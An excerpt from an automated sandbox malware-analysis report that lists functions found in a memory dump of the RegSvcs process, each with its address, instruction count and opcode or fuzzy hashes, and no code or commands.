                                                                          • Instruction Fuzzy Hash: 18318D326052418FCB31DF19D990E2AB7E6FB84360F0A446EE9959F361D730EC46DB92
                                                                          Function 014E4260 Relevance: .1, Instructions: 102COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ee2535bd8dc9ce4b18817df7f0c7f9a50a3847e26ac2c5d82157bb58e6f58e77
                                                                          • Instruction ID: f3226fc3c07e9ab9fd7a04e010aada5cece979b4958356ff53d62ea5792ba940
                                                                          • Opcode Fuzzy Hash: ee2535bd8dc9ce4b18817df7f0c7f9a50a3847e26ac2c5d82157bb58e6f58e77
                                                                          • Instruction Fuzzy Hash: 1F41A071204745DFD722CF28C484BDA7BE5BF59754F15842EE66ACB2A0C774E804CB60
                                                                          Function 01594BB0 Relevance: .1, Instructions: 101COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: caf79275486d15abbb21971d85def7b80564645d99d2e3622422bd0af0905c96
                                                                          • Instruction ID: d5e76fa9281e819a23c7b3fdc36ad88390b59467b1d0ba092c7f95c3c3a71bfb
                                                                          • Opcode Fuzzy Hash: caf79275486d15abbb21971d85def7b80564645d99d2e3622422bd0af0905c96
                                                                          • Instruction Fuzzy Hash: 1E317E716052418FDB20DF29D980E2AB7E5FB84710F05496DE9659F391E730EC06CB92
                                                                          Function 0155EB1D Relevance: .1, Instructions: 100COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ab13415d0fc99582091eb62be7a8e38f7e7abea699837e92d61b802033b263fb
                                                                          • Instruction ID: 5ff0bbb0105f287891ab3b0aa07da62e834c001286a73d1749a01efca5ef8689
                                                                          • Opcode Fuzzy Hash: ab13415d0fc99582091eb62be7a8e38f7e7abea699837e92d61b802033b263fb
                                                                          • Instruction Fuzzy Hash: C431E4322016829BF3229B5DCD69B29FBD8FB50750F1D00A6AF458F6E1DB28D941C220
                                                                          Function 015A61C3 Relevance: .1, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 20601f0f93922e59b20de3e473749762253e903fc1780168eae754b5c92f789b
                                                                          • Instruction ID: 76f39620ecc760f67a73fe40554707ebb5af21a63afcfad0a93c584bae24f6cc
                                                                          • Opcode Fuzzy Hash: 20601f0f93922e59b20de3e473749762253e903fc1780168eae754b5c92f789b
                                                                          • Instruction Fuzzy Hash: 2331B276A40156ABDB15DF98C840BAEB7B5FF44740F894169E900AF284D770ED41CBA4
                                                                          Function 0158483A Relevance: .1, Instructions: 96COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dce05d64d47e76cf590bb9b8f58868f61825f9b58c1abb622a177fa297de3be4
                                                                          • Instruction ID: dbabd3f205c1f1857cf44442ab3204593bd0b215cb7b8edc4bf12275066638e0
                                                                          • Opcode Fuzzy Hash: dce05d64d47e76cf590bb9b8f58868f61825f9b58c1abb622a177fa297de3be4
                                                                          • Instruction Fuzzy Hash: D3313476A4112EABCF31EF55DC44BDEBBB5BB98350F1500A5A908A7250DB309E518F90
                                                                          Function 0150EB20 Relevance: .1, Instructions: 96COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9df18178f1126cdaa5422e764683a88b50bd3631a17327e4247e2a313ee55067
                                                                          • Instruction ID: 875f927b5932e85cc5fa0cc636edda976a2aa873fa865c49c88f3b88eaa11526
                                                                          • Opcode Fuzzy Hash: 9df18178f1126cdaa5422e764683a88b50bd3631a17327e4247e2a313ee55067
                                                                          • Instruction Fuzzy Hash: 1731B972E00615AFDB22DFEDC841B9EBBF8FF54750F11482AE555DB290D2709E008BA0
                                                                          Function 015A60B8 Relevance: .1, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e19e5cba66bb3bbf510c190eb9c66972db7c4cfe2e7f9b92171f0c3a6cd66f4c
                                                                          • Instruction ID: b67bdc26ef34cfb7585123a42f0001e1d0d5239dfaa1f9813dc7374365e05de1
                                                                          • Opcode Fuzzy Hash: e19e5cba66bb3bbf510c190eb9c66972db7c4cfe2e7f9b92171f0c3a6cd66f4c
                                                                          • Instruction Fuzzy Hash: F031C272A80606AFDB229FADC850B6EBBB9BF54754F44006DE605DF352DA70EC018B91
                                                                          Function 014E07AF Relevance: .1, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 88a6c5527759b5bebb78d487f2a88566ebe2811a49fcca6c393be4e359ae835c
                                                                          • Instruction ID: 72cda58f0a3ff83fb5b63d2bbec36aab1b7046f4b02568e225bdd4d7780ebfa6
                                                                          • Opcode Fuzzy Hash: 88a6c5527759b5bebb78d487f2a88566ebe2811a49fcca6c393be4e359ae835c
                                                                          • Instruction Fuzzy Hash: A031E432B04616DBC712DE698884A6BBBE5FFE4251F01452EFD659B320DA70DC0187E1
                                                                          Function 014E8550 Relevance: .1, Instructions: 94COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3cf18119323c811569bfc5479f0dc7fd64b7969be8a6826f782989656a61f973
                                                                          • Instruction ID: bc073960b4d2c132d6ce83f9ab7f2b2dc6629cbbe8f43754d17acf1dc960630b
                                                                          • Opcode Fuzzy Hash: 3cf18119323c811569bfc5479f0dc7fd64b7969be8a6826f782989656a61f973
                                                                          • Instruction Fuzzy Hash: 64318D716093128FE720CF19D844B2BBBE5FB98704F15496EF9889B361D771E844CBA1
                                                                          Function 0151A6C7 Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                          • Instruction ID: ab42b2a68db60cc19dd4f04d2a2a763be4d6363d267daa54a60ca4e5361bfe5a
                                                                          • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                          • Instruction Fuzzy Hash: 96312DB2B01B41AFE762CF69DD40B5BBBF8BF48650F04092DA59AC7651E630E900CB60
                                                                          Function 0158EBD0 Relevance: .1, Instructions: 91COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 232ce93a450f60c741d94a2e74f4037eea8e3d1e58bc655dafbdc670cd388fa4
                                                                          • Instruction ID: 640626ede579d4d11b284623b1082c2ca223c180157d9f5841a44710417eb864
                                                                          • Opcode Fuzzy Hash: 232ce93a450f60c741d94a2e74f4037eea8e3d1e58bc655dafbdc670cd388fa4
                                                                          • Instruction Fuzzy Hash: BA3187B1909342DFCB21EF1AC54195ABBF1FF99214F0549AEE488AF351E330DA45CB92
                                                                          Function 0150438F Relevance: .1, Instructions: 89COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1d248d898607a30213c63d893cde38711221ea31c0d8441bcd67d39a4954a089
                                                                          • Instruction ID: e85fd2dd93a8862b6d6ed846f73e620babb255b1ed6c039f14bb6ebd95c4b2ee
                                                                          • Opcode Fuzzy Hash: 1d248d898607a30213c63d893cde38711221ea31c0d8441bcd67d39a4954a089
                                                                          • Instruction Fuzzy Hash: EE31D632B002469FD721DFE9C981A6E7BF9BF94308F018529D615DB294D730E945CB61
                                                                          Function 014DCB7E Relevance: .1, Instructions: 89COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                          • Instruction ID: ca1a0ebaca42ff334f17dd9146a78135f881ccbd80aae7e3e10958fb9a6b74ce
                                                                          • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                          • Instruction Fuzzy Hash: CA212632E0125BAADB11DFB98851BAFBBB5BF54740F15803AAE55EB350E270D900C7A0
                                                                          Function 014DC156 Relevance: .1, Instructions: 88COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6df595d2bc4242555f6897a525a22870dede8778a7769efe20521a9a54b88a5c
                                                                          • Instruction ID: 69ebd6160961b078e9e72f95e0d4065c877c06ce7d5fc43d33d2b40a035c2096
                                                                          • Opcode Fuzzy Hash: 6df595d2bc4242555f6897a525a22870dede8778a7769efe20521a9a54b88a5c
                                                                          • Instruction Fuzzy Hash: 4C314D715002118BDB32AF68CC44B6D77B4FF90314F94816EDD469F392DA74D98ACB90
                                                                          Function 0159C3CD Relevance: .1, Instructions: 88COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                          • Instruction ID: 224a47dd9e6c23aec8e034bba4224a68c71498cbebdaf22364f16a210044065f
                                                                          • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                          • Instruction Fuzzy Hash: F2212B3A700653A6DF15AB958800ABEBBB8FF90711F40801EFA998F691E735D940C3B1
                                                                          Function 014DE420 Relevance: .1, Instructions: 88COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 04b2eac9f228e330f26fb1b7dede8544f8d42456c0adca1007e2b8d5fd197384
                                                                          • Instruction ID: 4ec13c693ae612e5b32884d29c60c083c37b0fc2703ae1e389e5d89d3ae3198d
                                                                          • Opcode Fuzzy Hash: 04b2eac9f228e330f26fb1b7dede8544f8d42456c0adca1007e2b8d5fd197384
                                                                          • Instruction Fuzzy Hash: 5931F632A0012D9BDF31DF19CC51FEE77B9AB15750F0101A6E645BF2A0D6709E818F90
                                                                          Function 01514588 Relevance: .1, Instructions: 87COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                          • Instruction ID: 2271c564bf66982518ae96aae02b20c68742577a30936bbcf2204aeddc0a451c
                                                                          • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                          • Instruction Fuzzy Hash: DD219136A00749EBDB12CF58C980A8EBBB5FF48368F10C469EE159F245D770EA058B90
                                                                          Function 015144B0 Relevance: .1, Instructions: 87COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6a28e2703d24e481c4794e4c2134b377a60dde6550f9416916034ed2c5ba09e5
                                                                          • Instruction ID: d7ba2f40053c97a2a535bac49fb2f33f6e347e005f26c1d1f439258b573780d2
                                                                          • Opcode Fuzzy Hash: 6a28e2703d24e481c4794e4c2134b377a60dde6550f9416916034ed2c5ba09e5
                                                                          • Instruction Fuzzy Hash: 6021F2726047469BDB22DF18C880B6B77E4FF88760F024929FD589F284C730E900CBA2
                                                                          Function 014DE388 Relevance: .1, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                          • Instruction ID: f2c925760b6bad04c91c98113e1af5db88e8544f7d9393cbf1dcd78fe8b030c7
                                                                          • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                          • Instruction Fuzzy Hash: 4C318B31600605AFEB21CF68C894F6AB7B9FF85354F1045AAE5129B2A1E730EE02CB50
                                                                          Function 0155E609 Relevance: .1, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4af30b0eaad1077c6cba61b116da6ce354c4a404e33c56f9cefa8fda57610943
                                                                          • Instruction ID: b4e35d78a482254e0799a7eca78c56958a11d8b62789efde0cc4b2b0a2df6a7e
                                                                          • Opcode Fuzzy Hash: 4af30b0eaad1077c6cba61b116da6ce354c4a404e33c56f9cefa8fda57610943
                                                                          • Instruction Fuzzy Hash: 97319A75A00206DFCB64CF58D8959AEB7F5FF88340B15445AEC0A9F391EB31EA41CBA1
                                                                          Function 014E8D59 Relevance: .1, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                          • Instruction ID: 2510d74586f54d1d54f10d3f9d770edb958ce6b894a8d1a26e1d7b622931eaae
                                                                          • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                          • Instruction Fuzzy Hash: D32136316006529BEB26DB2DE808B3977F4FF50758F0904A9EE028B7E2E379DC42C210
                                                                          Function 015606F1 Relevance: .1, Instructions: 79COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aa2103a82036f56760b836ed864eb7f4b9f1ef3b4c64e5b82e93e00fb10b21bb
                                                                          • Instruction ID: 725a663a2d45add405df0cbf304ca7cf5da8ebff5571850c09cba9a7559999c9
                                                                          • Opcode Fuzzy Hash: aa2103a82036f56760b836ed864eb7f4b9f1ef3b4c64e5b82e93e00fb10b21bb
                                                                          • Instruction Fuzzy Hash: 3A21807190062A9BCF24DF59C881ABEB7F8FF48740B51006AF541EB290D778AD41DBA1
                                                                          Function 0156019F Relevance: .1, Instructions: 78COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: baccd2553a3585141f5fb32070efadc5d39b92012d32d37b4c57109a34354d03
                                                                          • Instruction ID: 4b8344ade1b4415db075b1c622072beb1433a68000847390277529c506a3a0af
                                                                          • Opcode Fuzzy Hash: baccd2553a3585141f5fb32070efadc5d39b92012d32d37b4c57109a34354d03
                                                                          • Instruction Fuzzy Hash: 88218B72600645ABD715DF69D840F6AB7A8FF98740F14006AFA04DB7A0D638ED41CBA4
                                                                          Function 01560283 Relevance: .1, Instructions: 74COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a2e510b2a68dfa05fe4b0f7697c81c8c7b5e3c1840f031cda2f18c60950d0ca4
                                                                          • Instruction ID: 412069479f1eaea60d3e8d0d7a7b0602518cc481489787c859c5e16f0d75e10f
                                                                          • Opcode Fuzzy Hash: a2e510b2a68dfa05fe4b0f7697c81c8c7b5e3c1840f031cda2f18c60950d0ca4
                                                                          • Instruction Fuzzy Hash: CC21B072A047469BD712EF6AC944B5FBBDCFFA1250F08045ABE80CB2A1D734D905C6E2
                                                                          Function 01502835 Relevance: .1, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2595bae5cbb635b9c679bd13c7a8286df08c8fef1a601cc00573608dedaae3b2
                                                                          • Instruction ID: 610998c0c407d89389f65e9199e2245485433286e14e98161e5aa0ca457da025
                                                                          • Opcode Fuzzy Hash: 2595bae5cbb635b9c679bd13c7a8286df08c8fef1a601cc00573608dedaae3b2
                                                                          • Instruction Fuzzy Hash: E321F9316457819BF323976C8D18B283BD4BF41774F1803A9FA619F6E2DB78D901C240
                                                                          Function 0151A30B Relevance: .1, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b9e5bc4f269e962a59870a03fd6a41a3b2f1a890f4e58888960ff9f79a68f182
                                                                          • Instruction ID: 8372b5483d92216e5289a5932540301c2257497c2840319b051b75378a25a18e
                                                                          • Opcode Fuzzy Hash: b9e5bc4f269e962a59870a03fd6a41a3b2f1a890f4e58888960ff9f79a68f182
                                                                          • Instruction Fuzzy Hash: 0221AC352416819FDB26DF29C841B46B7F5BF58708F24846DA509CFB61E331E842CB94
                                                                          Function 0159A49A Relevance: .1, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f635e067db8bcdcb44c948edab1d83662d09fdb8bbaaa2c0d0626258d50a142e
                                                                          • Instruction ID: 30136f14f069bb90a1a636f34518d8837f8b6285c87bef1a01b62bac9bc0e79a
                                                                          • Opcode Fuzzy Hash: f635e067db8bcdcb44c948edab1d83662d09fdb8bbaaa2c0d0626258d50a142e
                                                                          • Instruction Fuzzy Hash: BF11E772380A12BBEF225655AC41F2776D9EBD4B60F110428B718DF290DF70DC0187B6
                                                                          Function 01560946 Relevance: .1, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 30842a385db8f4502fecba34969e9f6945eea2226f4ab83c74a177fe58e6a608
                                                                          • Instruction ID: edb87b8a7d7360f15a1e1a15a7640e1949cd020008df21fc2935528117770d89
                                                                          • Opcode Fuzzy Hash: 30842a385db8f4502fecba34969e9f6945eea2226f4ab83c74a177fe58e6a608
                                                                          • Instruction Fuzzy Hash: 8D21E9B1E41209ABDB24DFAAD9809AEFBF9FF98610F10012FE505AB350DB709945CB54
                                                                          Function 015780A8 Relevance: .1, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                          • Instruction ID: cc2364eaa63b13b35f741bc84b16675f5405cda329e728058c118cae86a95977
                                                                          • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                          • Instruction Fuzzy Hash: CD218E72A0020AEFDF129F99EC45BAEBBB9FF98310F214819F914AB251D734D950CB50
                                                                          Function 01510124 Relevance: .1, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                          • Instruction ID: 595acf768c520669d72866f5780f71283c349b31a694cbafaf8a7f52ef80d381
                                                                          • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                          • Instruction Fuzzy Hash: C811E273640606AFE7239F44CD41F9ABBB8FB94764F10442AF6048F190D675ED84CB60
                                                                          Function 014E8770 Relevance: .1, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a8fc37fd77dc354dcbc74335730294d24a35365a91f4f43a617633a4b12b63bc
                                                                          • Instruction ID: 6e4898ebfb4d56ba7f04811d27a3bcaedb5b1fe057659efc32169e83a7a28ce0
                                                                          • Opcode Fuzzy Hash: a8fc37fd77dc354dcbc74335730294d24a35365a91f4f43a617633a4b12b63bc
                                                                          • Instruction Fuzzy Hash: 2E11B2357406129FDF11CF4DC884A17BBE9AF5A712B18406EEE08DF315D6B2D902C790
                                                                          Function 0151AAEE Relevance: .1, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
